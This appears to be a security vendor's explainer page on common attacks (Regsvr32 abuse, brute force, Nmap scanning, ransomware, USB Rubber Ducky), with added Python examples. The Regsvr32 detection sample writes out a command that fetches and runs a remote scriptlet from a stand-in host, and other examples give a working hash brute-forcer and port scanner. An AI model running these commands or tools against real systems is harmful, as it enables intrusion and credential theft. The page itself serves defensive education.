Cyberattack Series: Security in Action
We're putting our cybersecurity to the test against real-world attack scenarios. Follow along now through November 12th for a behind-the-scenes look at our security experts and technology in action against these seven attacks:
To kick off the Cyberattack Series, we've combined Phishing and Command & Control. There's no doubt that you've experienced phishing, but what happens when the bad guy's attack is successful?
Once the attacker has code running on a victim machine, the next step is often to open a channel from that host back to infrastructure the attacker controls, a technique called Command & Control (C2). Further instructions flow in over that channel and stolen data flows out, so it is the lifeline the rest of the intrusion depends on.
Regsvr32 is a built-in, Microsoft-signed Windows command-line utility for registering and unregistering DLLs. Because it is a trusted binary that is already present on every machine, adversaries abuse it to load and run their own code under its name, sidestepping application allow-listing and avoiding the attention a new executable would draw (MITRE ATT&CK tracks this as Signed Binary Proxy Execution, T1218.010). That's bad enough, but what happens after that? Windows User Account Control (UAC) is the consent step that lets a program elevate to admin-level permissions; attackers use UAC bypass techniques to obtain that elevation without the user ever seeing a prompt.
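Since the whole point of abusing Regsvr32 is to slip past tools that only look for unknown executables, the practical defence is to watch how the trusted binary is invoked. The following is an added detection example, written for this page rather than taken from the series or from any vendor product. The process-creation events are constructed samples in a Sysmon-like shape, the scoring weights and the `/i:http` + `scrobj.dll` pattern are assumptions based on publicly documented Regsvr32 abuse, and the threshold is arbitrary.

```python
import re

# Constructed sample process-creation events (not real telemetry). The shape
# mimics what a SIEM would normalise Sysmon Event ID 1 / Windows 4688 into.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "winword.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.9/x.sct scrobj.dll"},
    {"host": "ws02", "user": "bob", "parent": "explorer.exe",
     "cmdline": r'regsvr32.exe "C:\Program Files\Vendor\vendor.dll"'},
    {"host": "ws03", "user": "carol", "parent": "cmd.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\carol\AppData\Local\Temp\a.dll"},
    {"host": "ws04", "user": "SYSTEM", "parent": "services.exe",
     "cmdline": r"msiexec.exe /i setup.msi /qn"},
]

# Parents that have no business launching regsvr32 (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# DLL loaded from a location an unprivileged user can write to.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
ALERT_THRESHOLD = 3  # assumed; tune against your own baseline


def score_event(ev):
    """Score one event; returns (score, reasons). 0 means nothing suspicious."""
    cmd = ev["cmdline"]
    low = cmd.lower()
    if not low.startswith("regsvr32"):
        return 0, []
    score, reasons = 0, []
    # Scriptlet fetched over HTTP(S) and handed to the COM scriptlet handler:
    # regsvr32 will happily execute it, and nothing touches disk.
    if "/i:http://" in low or "/i:https://" in low:
        score += 3
        reasons.append("scriptlet loaded from a URL via /i:")
    if "scrobj.dll" in low:
        score += 2
        reasons.append("COM scriptlet handler (scrobj.dll) as the target")
    # /n /u suppress the DllRegisterServer path; rarely seen in legit admin use.
    if re.search(r"\s/n\b", low) and re.search(r"\s/u\b", low):
        score += 1
        reasons.append("register-bypass flags /n /u")
    if ev["parent"].lower() in OFFICE_PARENTS:
        score += 2
        reasons.append(f"spawned by Office process {ev['parent']}")
    if USER_WRITABLE.search(cmd):
        score += 1
        reasons.append("DLL path in a user-writable directory")
    return score, reasons


def detect(events, threshold=ALERT_THRESHOLD):
    """Return alerts as (host, score, reasons) for events at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev["host"], score, reasons))
    return alerts


if __name__ == "__main__":
    for host, score, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT {host} score={score}: " + "; ".join(reasons))
```

Only the first sample trips the rule; the vendor install from Program Files scores zero, and the lone Temp-path load scores 1, which is worth baselining but not paging on. Scoring several weak signals rather than matching one string is what keeps the rule from firing on every legitimate `regsvr32 vendor.dll`.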
A brute force attack is a trial-and-error method in which a program tries candidate values exhaustively, rather than through any cleverer strategy, until one works: guessing passwords against a login form or a stolen password hash, or trying every key in the key space of a cipher such as the Data Encryption Standard (DES). Just as a criminal might break into, or "crack", a safe by trying many possible combinations, a brute-force tool proceeds through all possible combinations of legal characters in sequence. Given enough time it is guaranteed to succeed, so its cost is governed entirely by the size of the search space and how long each guess takes. Yikes, they must really want what you have!
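To make "all possible combinations of legal characters in sequence" concrete, here is an added example (not code from the series) that recovers a password from its SHA-256 hash by exhaustive search and also computes how many candidates a given alphabet and length imply. The target password, the 36-character alphabet and the length limit are constructed for the demonstration; the use of plain SHA-256 is an assumption chosen to keep each guess cheap, which is exactly the property a real password store should not have.

```python
import hashlib
import itertools
import string

# "Legal characters" for the search, as the text puts it: 26 lowercase letters
# plus 10 digits (constructed choice for the example).
ALPHABET = string.ascii_lowercase + string.digits


def sha256_hex(s: str) -> str:
    """Stand-in for a stored password hash. Real systems should use a slow,
    salted KDF (bcrypt, scrypt, Argon2) so every guess costs far more than this."""
    return hashlib.sha256(s.encode()).hexdigest()


def keyspace(alphabet_size: int, max_len: int) -> int:
    """Number of candidates of length 1..max_len over an alphabet of that size."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


def brute_force(target_hex: str, alphabet: str, max_len: int):
    """Try every string of length 1..max_len, in sequence, until the hash matches.
    Returns (password, guesses_made) or (None, guesses_made) if the space is
    exhausted; the guess count is what an attacker is really paying for."""
    guesses = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            guesses += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hex:
                return candidate, guesses
    return None, guesses


if __name__ == "__main__":
    target = sha256_hex("ba")  # constructed, deliberately weak target
    pw, n = brute_force(target, ALPHABET, max_len=3)
    print(f"recovered {pw!r} after {n} guesses")
    print(f"36-char alphabet, up to 3 chars: {keyspace(36, 3):,} candidates")
    print(f"95 printable ASCII, up to 8 chars: {keyspace(95, 8):,} candidates")
    print(f"DES keys (56-bit): {2 ** 56:,}")
```

Two-character lowercase passwords fall in tens of guesses; eight characters of full printable ASCII is roughly 6.7 quadrillion, and a DES key space is 2^56. Those numbers are why brute force is a race between the attacker's guess rate and the defender's choices of length, alphabet, rate limiting and a slow hashing function.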
Nmap (Network Mapper) is a network discovery, analysis, and auditing tool used by both network defenders and network attackers, and over the years it has become one of the most widely used and well-supported tools in the field. With Nmap we can perform host-discovery sweeps to find the live hosts on a network, effectively "mapping" its topology. That is great for auditing purposes, but it is equally valuable reconnaissance for a hacker. Nmap is also a port scanner, so network admins (and attackers) can identify open ports and the services listening behind them, across a whole network or on individual critical systems.
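The Nmap equivalents of the two activities above are a ping sweep (`nmap -sn 192.0.2.0/24`) and a TCP connect scan with version detection (`nmap -sT -sV host`). The following added example, written for this page and not part of the series or of Nmap, shows the mechanism behind the second one: a threaded TCP connect scan that records which ports accept a connection and reads whatever banner the service volunteers, which is how services get identified. Because a real target would not be reachable offline, the block starts its own throwaway service on an ephemeral localhost port and scans the ports around it; the fake SSH-style banner, the port window and the timeouts are constructed for the demonstration.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def start_banner_service(banner: bytes = b"SSH-2.0-ExampleSvc_1.0\r\n"):
    """Constructed stand-in for a real network service: listens on an
    ephemeral 127.0.0.1 port and sends a banner to each client, like sshd
    does. Returns (port, close_fn)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listening socket closed: stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port, srv.close


def probe(host: str, port: int, timeout: float = 0.3):
    """TCP connect probe. A completed three-way handshake means the port is
    open; a refusal or timeout means closed/filtered. Returns (port, banner)
    for an open port, else None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(128).decode(errors="replace").strip()
            except socket.timeout:
                banner = ""  # open, but the service waits for us to speak first
            return port, banner
    except OSError:
        return None


def scan(host: str, ports, workers: int = 32):
    """Connect-scan a list of ports in parallel; returns {open_port: banner}."""
    open_ports = {}
    with ThreadPoolExecutor(max_workers=workers) as ex:
        for result in ex.map(lambda p: probe(host, p), ports):
            if result is not None:
                open_ports[result[0]] = result[1]
    return open_ports


if __name__ == "__main__":
    svc_port, close = start_banner_service()
    window = range(max(1, svc_port - 5), svc_port + 6)
    for port, banner in sorted(scan("127.0.0.1", window).items()):
        print(f"{port}/tcp open  {banner or '(no banner)'}")
    close()
```

This is the noisy end of the scanning spectrum: every probe completes a full handshake, so the target's service logs record each connection. Nmap's default SYN scan (`-sS`) stops short of that, which is one reason defenders should watch for bursts of half-open connections and not only for completed ones.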
The concept behind ransomware, a well-known form of malicious software, is quite simple: Lock and encrypt a victim’s computer data, then demand a ransom to restore access. In many cases, the victim must pay the cyber criminal within a set amount of time or risk losing access forever. Since we’re dealing with criminals here, paying the ransom doesn’t ensure access will be restored.
Ransomware is essentially the online form of the bully’s game of keep-away.
Imagine you could walk up to a computer, plug in a seemingly innocent USB drive, and have it install a backdoor, exfiltrate documents, steal passwords or any number of penetration testing tasks. All of these things can be done with many well-crafted keystrokes. If you could just sit in front of this computer, with photographic memory and perfect typing accuracy, you could do all of these things in just a few minutes.
The USB Rubber Ducky does this in seconds. It exploits the trust an operating system places in anything that enumerates as a USB Human Interface Device (HID): by posing as a keyboard it is accepted without drivers or prompts, and it then injects the prepared keystrokes at superhuman speed.
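The "well-crafted keystrokes" are written ahead of time in a small scripting language and replayed by the device. The following added example, written for this page and not taken from the series or from Hak5's firmware, is a simplified interpreter for that style of script: it turns `DELAY`, `STRING`, `ENTER` and modifier combos such as `GUI r` into a sequence of HID events and then estimates how long the injection takes at a device's keystroke rate versus a human's. The sample script is constructed and deliberately harmless (it opens Notepad and types a line); the command set, the per-keystroke timings and the `Event` structure are assumptions for the demonstration.

```python
from dataclasses import dataclass

# Modifier keys that start a combo such as "GUI r" or "CTRL ALT DELETE"
# (assumed subset of the real command language).
MODIFIERS = {"GUI", "WINDOWS", "CTRL", "CONTROL", "ALT", "SHIFT"}

# Constructed, harmless sample script for the demonstration.
SAMPLE_SCRIPT = """\
REM Constructed sample: open Notepad and type one line
DELAY 500
GUI r
DELAY 300
STRING notepad
ENTER
DELAY 1000
STRING Injected by a device that claims to be a keyboard.
"""


@dataclass
class Event:
    kind: str      # "delay" (ms), "keys" (one press of a key or combo), "string"
    value: object  # int for delay, list[str] for keys, str for string


def parse_ducky(script: str):
    """Translate script lines into the HID events the device would replay."""
    events, default_delay = [], 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)  # pause inserted after every later command
            continue
        if cmd == "DELAY":
            events.append(Event("delay", int(arg)))
            continue
        if cmd == "STRING":
            events.append(Event("string", arg))  # typed character by character
        elif cmd in MODIFIERS:
            events.append(Event("keys", [cmd] + arg.split()))  # e.g. GUI r
        else:
            events.append(Event("keys", [cmd]))  # bare key such as ENTER, TAB
        if default_delay:
            events.append(Event("delay", default_delay))
    return events


def estimate_ms(events, ms_per_key: float) -> float:
    """Total injection time: explicit delays plus one keystroke per character
    of each STRING and one per key combo, at the given keystroke interval."""
    total = 0.0
    for ev in events:
        if ev.kind == "delay":
            total += ev.value
        elif ev.kind == "string":
            total += len(ev.value) * ms_per_key
        else:
            total += ms_per_key
    return total


if __name__ == "__main__":
    events = parse_ducky(SAMPLE_SCRIPT)
    for ev in events:
        print(ev)
    # Assumed rates: ~1 ms per keystroke for the device, ~200 ms for a fast human.
    print(f"device: {estimate_ms(events, 1):.0f} ms, human: {estimate_ms(events, 200):.0f} ms")
```

The numbers make the "seconds versus minutes" claim concrete: almost all of the device's time is the explicit `DELAY`s it needs to let windows open, not the typing. It also shows the defensive angle, since a keyboard that produces complete commands faster than any person can type is a detectable anomaly, and the fix for the root cause is policy that restricts newly attached HID devices rather than hoping users never plug in an unknown drive.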